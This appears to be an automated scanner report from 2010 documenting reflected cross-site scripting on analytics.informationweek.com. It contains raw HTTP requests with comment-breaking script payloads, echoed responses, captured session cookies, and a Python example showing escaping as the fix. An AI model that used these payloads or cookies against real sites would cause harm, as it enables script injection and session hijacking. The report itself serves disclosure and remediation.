<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... %2FSecurity%2FSecurity.html%3Fc6fae--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed4745af9c41%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/21/Security/Security.html?c6fae--><script>alert(1)</script>d4745af9c41=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 8aad2--><script>alert(1)</script>45247f00081 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu8aad2--><script>alert(1)</script>45247f00081/22/Soa-and-app-architecture/Soa-app-architecture.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:44:56 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:44:56 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... u8aad2--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E45247f00081%2F22%2FSoa-and-app-architecture%2FSoa-app-architecture.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu8aad2--><script>alert(1)</script>45247f00081/22/Soa-and-app-architecture/Soa-app-architecture.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload 99435--><script>alert(1)</script>0f6f3fb8104 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/2299435--><script>alert(1)</script>0f6f3fb8104/Soa-and-app-architecture/Soa-app-architecture.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:10 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:10 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... F2299435--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E0f6f3fb8104%2FSoa-and-app-architecture%2FSoa-app-architecture.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/2299435--><script>alert(1)</script>0f6f3fb8104/Soa-and-app-architecture/Soa-app-architecture.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload 93610--><script>alert(1)</script>76b52b37fa6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/22/Soa-and-app-architecture93610--><script>alert(1)</script>76b52b37fa6/Soa-app-architecture.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:17 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:17 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... cture93610--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E76b52b37fa6%2FSoa-app-architecture.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/22/Soa-and-app-architecture93610--><script>alert(1)</script>76b52b37fa6/Soa-app-architecture.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload 55348--><script>alert(1)</script>023ecbbaa4d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/22/Soa-and-app-architecture/Soa-app-architecture.html55348--><script>alert(1)</script>023ecbbaa4d HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:30 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:30 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... re.html55348--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E023ecbbaa4d&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/22/Soa-and-app-architecture/Soa-app-architecture.html55348--><script>alert(1)</script>023ecbbaa4d"> ...[SNIP]...
3.110. http://analytics.informationweek.com/menu/22/Soa-and-app-architecture/Soa-app-architecture.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 87ec5--><script>alert(1)</script>6e8f57c142d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/22/Soa-and-app-architecture/Soa-app-architecture.html?87ec5--><script>alert(1)</script>6e8f57c142d=1 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 3F87ec5--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E6e8f57c142d%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/22/Soa-and-app-architecture/Soa-app-architecture.html?87ec5--><script>alert(1)</script>6e8f57c142d=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 725f3--><script>alert(1)</script>e4018ea580b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu725f3--><script>alert(1)</script>e4018ea580b/24/Storage-and-servers/Storage-server.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:13 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:13 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45933
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... k.com%2Fmenu725f3--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ee4018ea580b%2F24%2FStorage-and-servers%2FStorage-server.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu725f3--><script>alert(1)</script>e4018ea580b/24/Storage-and-servers/Storage-server.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload 95f54--><script>alert(1)</script>3e80f4846d9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/2495f54--><script>alert(1)</script>3e80f4846d9/Storage-and-servers/Storage-server.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:28 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:28 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45933
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... om%2Fmenu%2F2495f54--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E3e80f4846d9%2FStorage-and-servers%2FStorage-server.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/2495f54--><script>alert(1)</script>3e80f4846d9/Storage-and-servers/Storage-server.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload e57fc--><script>alert(1)</script>04da1a3ad92 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/24/Storage-and-serverse57fc--><script>alert(1)</script>04da1a3ad92/Storage-server.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:39 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:39 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45933
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... rage-and-serverse57fc--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E04da1a3ad92%2FStorage-server.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/24/Storage-and-serverse57fc--><script>alert(1)</script>04da1a3ad92/Storage-server.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload 90bb4--><script>alert(1)</script>ed69291834a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/24/Storage-and-servers/Storage-server.html90bb4--><script>alert(1)</script>ed69291834a HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:48 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:49 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45933
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... torage-server.html90bb4--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eed69291834a&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/24/Storage-and-servers/Storage-server.html90bb4--><script>alert(1)</script>ed69291834a"> ...[SNIP]...
3.115. http://analytics.informationweek.com/menu/24/Storage-and-servers/Storage-server.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://analytics.informationweek.com
Path: /menu/24/Storage-and-servers/Storage-server.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 37313--><script>alert(1)</script>18e562ca190 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/24/Storage-and-servers/Storage-server.html?37313--><script>alert(1)</script>18e562ca190=1 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... erver.html%3F37313--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E18e562ca190%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/24/Storage-and-servers/Storage-server.html?37313--><script>alert(1)</script>18e562ca190=1"> ...[SNIP]...
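The remediation detail above is terse, so here is an added illustration of the point it makes. This Python is not the site's code (the response headers show the page is served by PHP) and is not from the report; `render_vulnerable` and `render_hardened` are hypothetical stand-ins for the template line that echoes the requested URL, and `PROBE_URL` reuses the payload from the request above. It shows that `-->` (and the `--!>` sequence, which the HTML5 parser also treats as the end of a comment) terminates the comment and turns the rest of the value into live markup, and that entity-encoding the value closes that door. Because `html.escape(..., quote=True)` also encodes the double quote, the same call covers the quoted attribute value (`...">`) visible in the excerpts.

```python
"""Vulnerable and hardened rendering of a request URL into an HTML comment.

Added example, not code from the scanned site or from the report. The
render_* functions are hypothetical stand-ins for the template line that
echoes the request URL; the point is that a comment is not a safe sink.
"""
import html
import re

# A browser ends a comment at '-->' and also tolerates '--!>'.
COMMENT_END = re.compile(r"--!?>")

# Payload taken from the request in the finding above.
PROBE_URL = "/menu/24/Storage-and-servers/Storage-server.html90bb4--><script>alert(1)</script>ed69291834a"


def render_vulnerable(request_url):
    """Echo the URL verbatim into a comment, as the scanned page effectively does."""
    return f"<!-- requested: {request_url} -->\n<p>page body</p>"


def render_hardened(request_url):
    """Same template with HTML-entity encoding applied to the untrusted value.

    '<', '>', '&', '"' and "'" become entities, so neither '-->' nor '--!>'
    can appear in the output and no tag can be opened. Entities are not
    decoded inside comments, so the value is merely shown encoded.
    """
    return f"<!-- requested: {html.escape(request_url, quote=True)} -->\n<p>page body</p>"


def script_outside_comment(document):
    """True if a <script> tag ends up outside any comment after parsing.

    Comment-aware scan: drop every comment the way a browser would (from
    '<!--' to the first '-->' or '--!>', or to end of input if unclosed),
    then look for a script tag in what remains.
    """
    kept, i = [], 0
    while True:
        start = document.find("<!--", i)
        if start < 0:
            kept.append(document[i:])
            break
        kept.append(document[i:start])
        end = COMMENT_END.search(document, start + 4)
        i = end.end() if end else len(document)
    return "<script" in "".join(kept).lower()


if __name__ == "__main__":
    for name, render in (("vulnerable", render_vulnerable), ("hardened", render_hardened)):
        for url in (PROBE_URL, PROBE_URL.replace("-->", "--!>")):
            print(f"{name:<10} script reaches parser: {script_outside_comment(render(url))}")
```

The safer fix is to stop writing request-derived values into comments at all; debugging comments that echo the URL add nothing for users and give every path segment and parameter name a reflection point, which is exactly the pattern the scanner found five times per page here.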
The value of REST URL parameter 1 is copied into an HTML comment. The payload 86fdb--><script>alert(1)</script>525303269e0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu86fdb--><script>alert(1)</script>525303269e0/25/Virtualization/Virtualization.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:10 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:10 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45923
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... onweek.com%2Fmenu86fdb--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E525303269e0%2F25%2FVirtualization%2FVirtualization.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu86fdb--><script>alert(1)</script>525303269e0/25/Virtualization/Virtualization.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload 754ea--><script>alert(1)</script>75c80d2dc03 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/25754ea--><script>alert(1)</script>75c80d2dc03/Virtualization/Virtualization.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:21 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:21 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45923
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... eek.com%2Fmenu%2F25754ea--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E75c80d2dc03%2FVirtualization%2FVirtualization.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/25754ea--><script>alert(1)</script>75c80d2dc03/Virtualization/Virtualization.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload c7bf7--><script>alert(1)</script>bda4b5fc76c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/25/Virtualizationc7bf7--><script>alert(1)</script>bda4b5fc76c/Virtualization.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:34 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:35 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45923
